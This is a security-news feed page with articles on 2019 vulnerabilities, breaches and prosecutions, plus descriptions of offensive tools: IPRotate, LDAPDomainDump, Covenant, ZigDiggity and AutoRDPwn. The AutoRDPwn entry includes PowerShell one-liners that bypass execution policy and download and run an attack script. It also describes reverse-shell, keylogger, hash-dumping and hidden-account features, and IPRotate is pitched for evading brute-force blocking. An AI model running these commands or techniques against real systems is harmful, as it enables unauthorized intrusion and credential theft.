RSS Security

🔒
❌ About FreshRSS
There are new available articles, click to refresh the page.
Yesterday — August 24th 2019Your RSS feeds

IPRotate - Extension For Burp Suite Which Uses AWS API Gateway To Rotate Your IP On Every Request

By: Unknown

Extension for Burp Suite which uses AWS API Gateway to change your IP on every request.
More info: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/

Description
This extension allows you to easily spin up API Gateways across multiple regions. All the Burp Suite traffic for the targeted host is then routed through the API Gateway endpoints which causes the IP to be different on each request. (There is a chance for recycling of IPs but this is pretty low and the more regions you use the less of a chance.)
This is useful to bypass different kinds of IP blocking like bruteforce protection that blocks based on IP, API rate limiting based on IP or WAF blocking based on IP etc.

Usage
  1. Setup Jython in Burp Suite
  2. Install the boto3 module for Python 2
    pip install boto3
  3. Ensure you have a set of AWS keys that have full access to the API Gateway service. This is available through the free tier of AWS.
  4. Insert the credentials into the fields.
  5. Insert the target domain you wish to target.
  6. Select HTTPS if the domain is hosted over HTTPS.
  7. Select all the regions you want to use.(The more you use the larger the IP pool will be)
  8. Click "Enable".
  9. Once you are done ensure you click disable to delete all the resources which were started.
If you want to check on the resources and enpoints that were started or any potential errors you can look at the output console in Burp.

The Burp UI


Example of how the requests look


Setup
Make sure you have Jython installed and add IPRotate.py through the Burp Extension options.


Previous Research
After releasing this extension it was pointed out that there has been other research in this area using AWS API Gateway to hide an IP address. There is some awesome research and tools by @ustayready @ryHanson and @rmikehodges using this technique.
Be sure to check them out too:
https://github.com/ustayready/fireprox
https://github.com/rmikehodges/hideNsneak


Cisco released 4CAN hardware tool to find flaws in automotive computers

Cisco has released a hardware tool, called 4CAN, developed to help researchers to discover vulnerabilities in automotive systems. 

Computer systems in modern vehicles are very complex, they contain a huge quantity of devices and units that exchange a lot of data in real-time.

These components communicate via the vehicle’s network, dubbed Controller Area Network (CAN). Modern cars have multiple CAN buses combined with a gateway.

These components run software that could be potentially affected by security vulnerabilities that could be exploited by threat actors for several malicious purposes, from sabotage to surveillance.

Cisco has released a new hardware open-source tool called 4CAN that aims to help the automotive industry in security vehicles.

4can

Researchers could use 4CAN to test their on-board computers for potential security flaws, according to the company it is very easy to use. Vehicles analyzed by Cisco’s researchers have 4 CAN buses all connected to the same gateway.

“A typical vehicle setup has multiple CAN buses combined with a gateway to arbitrate access between the CAN buses. This gateway acts as a firewall and can check CAN IDs to determine if the message should be allowed to traverse CAN buses. In this way, critical ECUs can be isolated from non-critical ECUs.” reads the post published by Cisco Talos.

Cisco explained that 4CAN has been designed to achieve the following goals:

  • Validating communication policy for intra-CAN bus communication.
  • Fuzzing (sending randomized payloads) to components to identify vulnerabilities.
  • Exploring the CAN commands used to control/interact with the vehicle.
  • Simplify our testbench setup to keep everything organized and in sync.

The 4CAN project is loosely based on the IndustrialBerry QUAD CAN BUS adapter for Raspberry CanBerry

“Using 4CAN, the test bench setup is vastly simplified. With a single Raspberry Pi, we can simultaneously test four CAN channels, and since the 4CAN exposes the entire 40-pin GPIO header, we can remotely control the test vehicle,” Cisco continues. 

The 4CAN tool is available on GitHub, licensed under a Creative Commons Attribution Share-Alike license.

Pierluigi Paganini

(SecurityAffairs – 4CAN, hacking)

The post Cisco released 4CAN hardware tool to find flaws in automotive computers appeared first on Security Affairs.

Hacker will compensate victims with $1.1 million Bitcoin illegally earned

UK authorities have seized over £920,000 ($1.1 million) worth of Bitcoin from a prolific hacker, the funds will be used to compensate his victims.

Grant West, aka ‘Courvoisier,’ is a hacker that was arrested by the police on September 2017 as result of a two-year-long investigation code-named ‘Operation Draba.’

Bitcoin hacker compensate victims

The man was charged with multiple hacking and drug-related crimes.

In December he pleaded guilty and earlier this year, a UK court sentenced West to 10 years and eight months in prison.

West carried out phishing scams against hundreds of companies since 2015, he stole financial data of tens of thousands of customers and then sold that information on cybercrime underground forums.

“West was responsible for attacks on more than 100 companies worldwide. He predominately used ‘phishing’ email scams to obtain the financial data of tens of thousands of customers. West would then sell this personal data in different market places on the dark web.” reads a statement from Metropolitan Police Service (MPS).

“He would then convert the profit made from selling financial details online into cryptocurrency, and store these in multiple accounts.”

When the man was arrested the Metropolitan Police Cyber Crime Unit (MPCCU) raided his home and seized an SD card containing approximately 78 million individual usernames and passwords as well as 63,000 credit and debit card details.

The police also seized around £1.6 million in cryptocurrency stored in the wallets belonging to West, but the fluctuating value of Bitcoin and other digital currencies brought the seized funds down to £922, 978.14.

Authorities also seized a laptop of the West’s girlfriend that was containing personal financial information of more than 100,000 people.

West has been accused to have conducted phishing scams on the websites of 17 major companies including Uber, Sainsbury’s, Nectar, Groupon, T Mobile, AO.com, Argos, the Finnish Bitcoin exchange, the British Cardiovascular Society, Truly Experiences Ltd, and M R Porter.

West was also very active in the sale of cannabis on the dark web.

Now the Southwark Crown Court judge ordered him to pay back more than $1.1 million (over £922,000) using Bitcoins and other cryptocurrencies he earned from the sale.

The funds were confiscated under the Proceeds of Crime Act, in case West refused the confiscation order, he would serve a further four years in jail.

“The confiscation of the cryptocurrency, which West did not contest, follows a lengthy police investigation, codename ‘Operation Draba’, into the criminal activities of West, who was operating on the Dark Web under the moniker of ‘Courvoisier’.” continues the MPC.

“The cryptocurrency will now be sold, and the victims will receive compensation for the damage caused by the organised criminality committed by West.”

“The MPS is committed to ensuring that individuals who are committing criminality on the Dark Web are identified, prosecuted, and their criminal assets are seized.” said Detective Chief Inspector Kirsty Goldsmith, the Head of the MPCCU.

Pierluigi Paganini

(SecurityAffairs – cybercrime, Bitcoin)

The post Hacker will compensate victims with $1.1 million Bitcoin illegally earned appeared first on Security Affairs.

LDAPDomainDump - Active Directory Information Dumper Via LDAP

By: Zion3R

Active Directory information dumper via LDAP

Introduction
In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format.
ldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files.
The tool was designed with the following goals in mind:
  • Easy overview of all users/groups/computers/policies in the domain
  • Authentication both via username and password, as with NTLM hashes (requires ldap3 >=1.3.1)
  • Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impackets ntlmrelayx
The tool outputs several files containing an overview of objects in the domain:
  • domain_groups: List of groups in the domain
  • domain_users: List of users in the domain
  • domain_computers: List of computer accounts in the domain
  • domain_policy: Domain policy such as password requirements and lockout policy
  • domain_trusts: Incoming and outgoing domain trusts, and their properties
As well as two grouped files:
  • domain_users_by_group: Domain users per group they are member of
  • domain_computers_by_os: Domain computers sorted by Operating System

Dependencies and installation
Requires ldap3 > 2.0 and dnspython
Both can be installed with pip install ldap3 dnspython
The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump.

Usage
There are 3 ways to use the tool:
  • With just the source, run python ldapdomaindump.py
  • After installing, by running python -m ldapdomaindump
  • After installing, by running ldapdomaindump
Help can be obtained with the -h switch:
usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}]
[-o DIRECTORY] [--no-html] [--no-json] [--no-grep]
[--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER]
[-m]
HOSTNAME

Domain information dumper via LDAP. Dumps users/computers/groups and
OS/membership information to HTML/JSON/greppable output.

Required options:
HOSTNAME Hostname/ip or ldap://host:port connection string to
connect to (use ldaps:// to use SSL)

Main options:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME
DOMAIN\username for authentication, leave empty for
anonymous authentication
-p PASSWORD, --password PASSWORD
Password or LM:NTLM hash, will prompt if not specified
-at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE}
Authentication type (NTLM or SIMPLE, default: NTLM)

Output options:
-o DIRECTORY, --outdir DIRECTORY
Directory in which the dump will be saved (default:
current)
--no-html Disable HTML output
--no-json Disable JSON output
--no-grep Disable Greppable output
--grouped-json Also write json files for grouped files (default:
disabled)
-d DELIMITER, --delimiter DELIMITER
Field delimiter for greppable output (default: tab)

Misc options:
-r, --resolve Resolve computer hostnames (might take a while and
cause high traffic on large networks)
-n DNS_SERVER, --dns-server DNS_SERVER
Use custom DNS resolver instead of system DNS (t ry a
domain controller IP)
-m, --minimal Only query minimal set of attributes to limit memmory
usage

Options

Authentication
Most AD servers support NTLM authentication. In the rare case that it does not, use --authtype SIMPLE.

Output formats
By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already.

DNS resolving
An important option is the -r option, which decides if a computers DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD Domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause a high load on the domain controller.

Minimizing network and memory usage
By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch.

Visualizing groups with BloodHound
LDAPDomainDump includes a utility that can be used to convert ldapdomaindumps .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool will take the users/groups/computers/trusts .json file and convert those to group_membership.csv and trust.csv which you can add to BloodHound.


Buffer overflow exposes unpatched Squid servers to RCE and DoS attacks

Some versions of the Squid web proxy cache server built with Basic Authentication features are affected by a heap buffer overflow vulnerability.

The heap buffer overflow security flaw, tracked as CVE-2019-12527, could be exploited by attackers to trigger DoS condition and also to execute arbitrary code on the vulnerable servers.

The flaw received a high severity CVSS v3.0 base score of 8.8 by, an attacker could be exploited by sending a specially crafted request to any targeted server.

The flaw affects Squid 4.0.23 through 4.7, the root couse is the incorrect buffer management. When checking Basic Authentication with HttpHeader::getAuth, the proxy cache server stores the decoded data in aglobal buffer. The problem is that Squid does not check that the decoded length isn’t greater than the buffer, triggering a heap-based buffer overflow.

“Due to incorrect buffer management Squid is vulnerable to a heap overflow and possible remote code execution attack when processing HTTP Authentication credentials.” reads the security advisory.

“This allows a malicious client to write a substantial amount of arbitrary data to the heap. Potentially gaining ability to execute arbitrary code. On systems with memory access protections this can result in the Squid process being terminated unexpectedly. Resulting in a denial of service for all clients using the proxy. This issue is limited to traffic accessing the Squid Cache Manager reports or using the FTP protocol gateway.”

Squid team pointed out that the problem is limited to the traffic accessing the Cache Manager reports or using the FTP protocol gateway.

Squid development team addressed the flaw with the release of Squid 4.8 on July 9.

The security advisory recommends the following workarounds for servers that can’t be patched:

Deny ftp:// protocol URLs being proxied and Cache Manager report access to all clients:
    acl FTP proto FTP
    http_access deny FTP
    http_access deny manager

Or,

 Build Squid with --disable-auth-basic

An interesting technical analysis of the vulnerability was published by Trend Micro on the website of the Zero-day initiative.

Pierluigi Paganini

(SecurityAffairs – proxy cache server, hacking)

The post Buffer overflow exposes unpatched Squid servers to RCE and DoS attacks appeared first on Security Affairs.

Mastercard data breach affected Priceless Specials loyalty program

Mastercard disclosed a data breach that impacted customer data from the company’s Priceless Specials loyalty program.

The American multinational financial services corporation notified the data breach to the German and Belgian Data Protection Authorities.

The data leaked online includes customers’ names, payment card numbers, email addresses, home addresses, phone numbers, gender, and dates of birth.

The Belgian Data Protection Authority (DPA) as well as the Hessian authority of Germany have been notified by Mastercard company of a data breach detected on 19 August 2019 which would have affected a large number of data subjects, a significant portion of which would be German customers.” reads the press release published by the Belgian Data Protection Authority.“Since the main establishment of Mastercard is located in Waterloo, the Belgian DPA is working closely with its Hessian counterpart and the other competent authorities to defend the interests of the persons affected by this incident.

Mastercard confirmed that “the incident is limited to the Specials program,” the company added that the only payment card data leaked online were the numbers of payment cards.

“Based on the facts known at this time, the following personal information is affected: payment card number, title, name, date of birth, gender, mailing address, e-mail address and telephone number and the time of first registration with Priceless Specials. Neither access data nor passwords were published. The expiration date of payment cards and the check digit (CVC) were also not published.” states MasterCard.

In response to the data leak, Mastercard suspended the German Priceless Specials and took down its website. The website displays the following message.

“We have received a lot of questions and complaints since the announcement of this incident, we want to reassure users: we have contacted MasterCard in order to get additional information, and are following this case closely together with the Hessian data protection authority and all the other possible concerned authorities.” said David Stevens, Chairman of the Belgian Data Protection Authority.

The data breach was discovered after the loyalty program data was leaked online on August 19. MasterCard immediately took action to remove the information, but on August 21, a second file was published online.

“On August 21, 2019, we became aware that a second file of personal information was published on the Internet. We are working to remove them as well.”

According to Heise Media, the Excel spreadsheets leaked online after Mastercard’s Priceless Specials loyalty program was breached were containing roughly 90,000 and 84,000 rows.

Mastercard immediately launched an investigation and informed authorities, it is also actively monitoring whether stolen info is posted online.

“We are working closely with the relevant authorities to investigate this incident,” adds Mastecard also stating that they are “currently reviewing our security safeguards to protect this information to identify appropriate improvements to protect against similar incidents in the future.”

Impacted customers have been notified about the data leak, MasterCard will offer them one-year free credit monitoring and identity theft prevention service.

Pierluigi Paganini

(SecurityAffairs – MasterCard, hacking)

The post Mastercard data breach affected Priceless Specials loyalty program appeared first on Security Affairs.

Before yesterdayYour RSS feeds

Lenovo Solution Centre flaw allows hacking Windows laptop in 10 minutes

Researchers at Pen Test Partners (PTP) discovered a privilege-escalation vulnerability in Lenovo Solution Centre (LSC) tracked as CVE-2019-6177.

Security experts at Pen Test Partners (PTP) discovered a privilege-escalation vulnerability in Lenovo Solution Centre (LSC) that exists since 2011.

“A vulnerability reported in Lenovo Solution Center version 03.12.003, which is no longer supported, could allow log files to be written to non-standard locations, potentially leading to privilege escalation.” read the security advisory published by Lenovo. “Lenovo ended support for Lenovo Solution Center and recommended that customers migrate to Lenovo Vantage or Lenovo Diagnostics in April 2018.”

The vulnerability tracked as CVE-2019-6177 could be exploited by attackers to escalate privileges.

The company attempted to downplay the severity of the issue highlighting that the product is no longer supported, even if most of the laptops running of the Chinese vendor, Windows OS, are shipped with the flawed software.

“We found a privilege escalation vulnerability in the Lenovo Solution Centre (LSC) software, which came pre-installed on many Windows-based Lenovo devices.” states the post published by Pen Test Partners.

“The bug itself is a DACL (discretionary access control list) overwrite, which means that a high-privileged Lenovo process indiscriminately overwrites the privileges of a file that a low-privileged user is able to control. In this scenario, a low-privileged user can write a ‘hardlink‘ file to the controllable location – a pseudofile which really points to any other file on the system that the low-privileged user doesn’t have control of.”

The experts explained that the Lenovo Solution Centre adds a task at “\Lenovo\Lenovo Solution Center Launcher”, which runs with “highest privileges”.

Lenovo Solution Centre

The task created by the LSC runs the LSC.Services.UpdateStatusService.exe binary 10 minutes after a login event.

The binary executed by the scheduled task overwrites the DACL of the Lenovo product’s logs folder, giving everyone in the Authenticated Users usergroup full read/write access to them. Everyone is a member of Authenticated Users, this means that everyone could access those files.

In order to exploit the flaw, attackers have to create a hardlink file in the C:\ProgramData\Lenovo\LSC\log\ directory that points to the file he wants to overwrite the privileges of.

It is quite easy for an attacker with access to the machine to run arbitrary code with administrator-level privileges.

“Then you log out, log in, and 10 minutes later, the hosts file DACL will be overwritten.” wrote the researchers.

The only way to fix the issue is to uinstall Lenovo Solution Centre, customers could install Lenovo Vantage or Lenovo Diagnostics to have the same functionalities.

Pen Test Partners criticized the way Lenovo managed the report of the flaw because Lenovo seems to have moved the EOL date back to April 2018.

“But just after their disclosure went out, we noticed they had changed the end of life date to make it look like it went end of life even before the last version was released.”

Pierluigi Paganini

(SecurityAffairs – Lenovo Solution Centre, hacking)

The post Lenovo Solution Centre flaw allows hacking Windows laptop in 10 minutes appeared first on Security Affairs.

Covenant - A .NET Command And Control Framework For Red Teamers

By: Zion3R

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.



Quick-Start Guide
Please see the Installation and Startup guide to get started with Covenant!
The Wiki documents most of Covenant's core features and how to use them.

Features
Covenant has several key features that make it useful and differentiate it from other command and control frameworks:
  • Intuitive Interface - Covenant provides an intuitive web application to easily run a collaborative red team operation.
  • Multi-Platform - Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed.
  • Multi-User - Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
  • API Driven - Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
  • Listener Profiles - Covenant supports listener “profiles” that control how the network communication between Grunt implants and Covenant listeners look on the wire.
  • Encrypted Key Exchange - Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.
  • Dynamic Compilation - Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
  • Inline C# Execution - Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
  • Tracking Indicators - Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in it’s infancy and still has room for improvement.
  • Developed in C# - Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion
Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.


Hacker Ordered to Pay Back Nearly £1 Million to Phishing Victims

A prolific hacker who carried out phishing scams against hundreds of companies worldwide has been ordered to pay back more than $1.1 million (over £922,000) worth of cryptocurrencies to his victims. Grant West, a 27-year-old resident of Kent, England, targeted several well-known companies around the world since 2015 to obtain the financial data of tens of thousands of customers and then sold

A new variant of Asruex Trojan exploits very old Office, Adobe flaws

Experts at Trend Micro discovered a new variant of the Asruex Trojan that exploits old Microsoft Office and Adobe vulnerabilities to infect systems.

Malware researchers at Trend Micro discovered a new variant of the Asruex Trojan that exploits old Microsoft Office and Adobe vulnerabilities to infect Windows and Mac systems.

Asruex first appeared in the threat landscape 2015, researchers linked it to the spyware used by the DarkHotel APT group.

“However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector particularly through the use of old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which inject code in Word and PDF files respectively.” reads the report published by Trend Micro.

CVE-2012-0158 is a critical remote code execution (RCE) vulnerability that affected Microsoft Office. 

CVE-2010-2883 is a stack buffer overflow flaw that could be exploited by attackers to execute arbitrary code or trigger a denial of service condition. 

The attack chain leverages a shortcut file that has a PowerShell download script, and spreads through removable drives and network drives.

Asruex Trojan

The use of exploits for well-known vulnerabilities that have been already patched suggests that attackers aims at infect specific targets who have been using older versions of Adobe Reader (versions 9.x up to before 9.4) and Acrobat (versions 8.x up to before 8.2.5) on Windows and Mac OS X.

Because of this unique infection capability, security researchers might not consider checking files for an Asruex infection and continue to watch out for its backdoor abilities exclusively. Awareness of this new infection method could help users defend against the malware variant.

Trend Micro researchers discovered the new Asruex variant in malicious .PDF files that was spread via phishing messages.

Researchers reported that attackers also used weaponized Word files to deliver the Asruex Trojan, in other cases the malicious code is delivered as a standard executable.

“This Asruex variant compresses and encrypts the original executable file or host file and appends it as its .EBSS section. This allows the malware to drop the infector, while also executing the host file like normal.” continues the report.

Once executed on a machine, Asruex will check the following information to determine if it is running in a sandbox environment:

  • Computer names and user names
  • Exported functions by loaded modules
  • File names
  • Running processes
  • Module version of running process
  • Certain strings in disk names

If the systems passes the checks, the backdoor is installed on the system.

“This case is notable for its use of vulnerabilities that have been discovered (and patched) over five years ago, when we’ve been seeing this malware variant in the wild for only a year,” Trend Micro concludes. “This hints that the cybercriminals behind it had devised the variant knowing that users have not yet patched or updated to newer versions of the Adobe Acrobat and Adobe Reader software.”

Pierluigi Paganini

(SecurityAffairs – Asruex Trojan, malware)

The post A new variant of Asruex Trojan exploits very old Office, Adobe flaws appeared first on Security Affairs.

Hackers are scanning the web for vulnerable Fortinet, Pulse Secure Products installs

Hackers are exploiting recently disclosed flaws in enterprise virtual private network (VPN) products from Fortinet and Pulse Secure.

The popular cybersecurity expert Kevin Beaumont has observed threat actors attempting to exploit the CVE-2018-13379 in the FortiOS SSL VPN web portal and CVE-2019-11510 flaw in Pulse Connect Secure.

Fortigate Fortinet SSL VPN is being exploited in the wild since last night at scale using 1996 style ../../ exploit – if you use this as a security boundary, you want to patch ASAP https://t.co/IaBSqZJ9iS

— Kevin Beaumont (@GossiTheDog) August 22, 2019

The CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files.

“A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.” reads the security advisory.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE that found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents.

The security duo shared the results of their analysis at the Black Hat and DEFCON hacking conferences and proof-of-concept (PoC) exploits were publicly disclosed after their talks.

Even if the impacted vendors have released security advisories for the vulnerabilities discovered by the experts, attackers are attempting to exploit them in attacks in the wild.

Fortigate are calling this issue in FortiOS a “vulnerability” but to be clear it’s actually a major backdoor.

The backdoor code is flat out there in the OS, it even needs a ‘secret’ code typed to trigger it.

How did a major firewall vendor (almost 500k IPs) end up backdoored? https://t.co/GzCNXqtxDj

— Kevin Beaumont (@GossiTheDog) August 22, 2019

Beaumont pointed out that an attacker could exploit the CVE-2018-13379 flaw to obtain administrator credentials in plain text, using the binaryedge online scanner he also found nearly half a million IP addresses associated with Fortinet devices exposed online.

Beaumont detected scanning activity aimed at vulnerable Fortinet systems on August 21, while he spotted threat actors targeting Pulse Secure systems on August 22.

Clearly, it is important that admins will apply security patches released by vendors as soon as possible to mitigate possible attacks.

Pierluigi Paganini

(SecurityAffairs – Pulse Security Products, hacking)

The post Hackers are scanning the web for vulnerable Fortinet, Pulse Secure Products installs appeared first on Security Affairs.

ZigDiggity – ZigBee Hacking Toolkit

By: Darknet
ZigDiggity – ZigBee Hacking Toolkit

ZigDiggity a ZigBee Hacking Toolkit is a Python-based IoT (Internet of Things) penetration testing framework targeting the ZigBee smart home protocol.

ZigBee continues to grow in popularity as a method for providing simple wireless communication between devices (i.e. low power/traffic, short distance), & can be found in a variety of consumer products that range from smart home automation to healthcare. Security concerns introduced by these systems are just as diverse and plentiful, underscoring a need for quality assessment tools.

Read the rest of ZigDiggity – ZigBee Hacking Toolkit now! Only available at Darknet.

AutoRDPwn v5.0 - The Shadow Attack Framework

By: Zion3R

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on-demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements
Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteed its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on a line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



Credits and Acknowledgments
This framework uses the following scripts and tools:
• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper of Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more, that do not fit here .. Thanks to all of them and their excellent work.

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net


Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant that connected its system online to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure, such kind of incident could potentially expose high-sensitive information.

The security incident has happened in July at the South Ukraine Nuclear Power Plant at Yuzhnoukrainsk, in the south of the country.

On July 10, agents of the SBU raided the nuclear power plant and discovered the equipment used by the employees to mining cryptocurrency.

The equipment was discovered present in the power plant’s administration offices.

The Ukrainian authorities are currently investigating if any attackers may have had access to exposed systems to information that could threaten national security.

The SBU seized equipment composed of two metal cases containing that included coolers and video cards (Radeon RX 470 GPU), computer components commonly used in mining factories.

“Further, the SBU also found and seized additional equipment[12] that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” reported ZDnet.

The authorities have charged several employees, but at the time, none was arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering an employee abused institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

Google Proposes 'Privacy Sandbox' to Develop Privacy-Focused Ads

Google today announced a new initiative—called Privacy Sandbox—in an attempt to develop a set of open standards that fundamentally enhances privacy on the web while continuing to support a free, open and democratic Internet through digital advertisements. A lot of websites on the Internet today, including The Hacker News, rely on online advertisements as their primary source of funding to

Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches

Cisco provided updates for security advisories for three flaws affecting Cisco Small Business 220 Series Smart Switches patched in early August.

Cisco has updated security advisories for three vulnerability in Cisco Small Business 220 Series Smart Switches that have been patched in early August. The three vulnerabilities were reported by the security researcher Pedro Ribeiro, aka ‘bashis‘, via Cisco’s VDOO Disclosure Program.

According to the Cisco Product Security Incident Response Team (PSIRT), public exploit code for these flaws is available online.

Cisco Small Business 220 Series Smart Switches

One of the vulnerabilities is critical remote code execution tracked as CVE-2019-1913, an attacker could exploit this flaw to execute arbitrary code with root privileges on the underlying operating system.

“Multiple vulnerabilities in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to overflow a buffer, which then allows the execution of arbitrary code with root privileges on the underlying operating system.” reads the security advisory.

“The vulnerabilities are due to insufficient validation of user-supplied input and improper boundary checks when reading data into an internal buffer. An attacker could exploit these vulnerabilities by sending malicious requests to the web management interface of an affected device. Depending on the configuration of the affected switch, the malicious requests must be sent via HTTP or HTTPS.

